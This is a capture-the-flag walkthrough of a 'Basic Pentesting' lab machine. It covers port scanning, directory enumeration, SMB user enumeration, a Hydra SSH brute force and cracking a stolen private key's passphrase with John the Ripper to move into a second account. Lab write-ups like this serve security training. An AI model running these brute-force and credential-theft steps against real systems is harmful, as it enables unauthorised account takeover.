Basic Pentesting
1. Reconnaissance and Scanning
export TARGET_IP=10.10.195.185
nmap -p- --min-rate 5000 $TARGET_IP -oN nmap_fullscan.txt
Results:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Key Observations:
- SSH (Port 22): Secure Shell, used for remote command-line access.
- HTTP (Port 80): Standard web server port.
- NetBIOS/SMB (Ports 139, 445): Windows file sharing and network services.
- AJP13 (Port 8009): Apache JServ Protocol, often used with Apache Tomcat.
- HTTP-Proxy (Port 8080): Another HTTP-related service, potentially an alternative web server or proxy.
1.1. Web Directory Enumeration (Feroxbuster)
A directory brute-force attack was performed on the web server (port 80) to identify hidden directories and files:
feroxbuster -u http://10.10.195.185 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -o feroxbuster_scan.txt --no-state
Results:
http://10.10.195.185/development/ (Directory Listing Enabled)
2. Directory Listing Analysis and Information Gathering
Browsing to http://10.10.195.185/development/ revealed two text files: dev.txt and j.txt. These files contained valuable information:
2.1. dev.txt Analysis:
- Apache Struts 2: The developer ("K") mentions using Apache Struts 2, specifically version 2.5.12 (REST plugin). This is a critical finding, as Struts 2 has a history of vulnerabilities.
- SMB Configured: Confirmation that SMB is configured.
- Apache Setup: Confirmation of Apache web server.
2.2. j.txt Analysis:
- Weak Password Policy: "K" mentions cracking "J's" password easily, indicating a weak password policy.
3. User Enumeration and Password Cracking
3.1. SMB User Enumeration enum4linux
enum4linux was used to enumerate users via the SMB service:
enum4linux -a 10.10.195.185 > enum4linux_results.txt
Results:
Two users were identified:
kayjan
3.2. SSH Password Brute-Force (Hydra)
A brute-force attack was attempted against the SSH service for the user jan, using the rockyou.txt wordlist:
hydra -V -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.185 -f -o hydra_results.txt
Results:
- Successful login for
janwith passwordarmando.
4. Initial Access and Privilege Escalation
4.1. SSH Login
Successful login to the system via SSH using the cracked credentials:
ssh jan@10.10.195.185
4.2. System Enumeration (LinPEAS)
To identify potential privilege escalation vectors, LinPEAS (Linux Privilege Escalation Awesome Script) was transferred to the target and executed:
scp linpeas.sh jan@10.10.195.185:/tmp
ssh jan@10.10.195.185
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh > linpeas_output.txt
/tmp: is commonly used as a good directory for the pentester to place files, for it is world-writable.
Key Finding (LinPEAS):
LinPEAS identified a potential private SSH key for the user kay located at /home/kay/.ssh/id_rsa.
4.3. SSH Key Retrieval and Cracking
- The
id_rsafile was accessed (read) fromjan's account. Becausejandoes not have write access tokay's home directory, we cannot usescpto copy the file directly. Instead, the contents of the file were printed to the terminal and manually copied. - The key was saved locally to a file named
id_rsa_kay. ssh2johnwas used to convert the key into a format suitable for John the Ripper.- John the Ripper was used to crack the passphrase protecting the private key.
cat /home/kay/.ssh/id_rsa # (On target, as jan, copy output)
# ... (On attacker machine) ...
echo "PASTE_COPIED_KEY_HERE" > id_rsa_kay
ssh2john id_rsa_kay > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Result:
- The passphrase for
kay's SSH key was cracked:beeswax.
4.4. Privilege Escalation (SSH as kay)
Using the cracked passphrase and the private key, successful login as kay was achieved:
ssh -i id_rsa_kay kay@10.10.195.185
4.5 Final Password Retrieval
The pass.bak file was found and read, revealing the final password:
cat pass.bak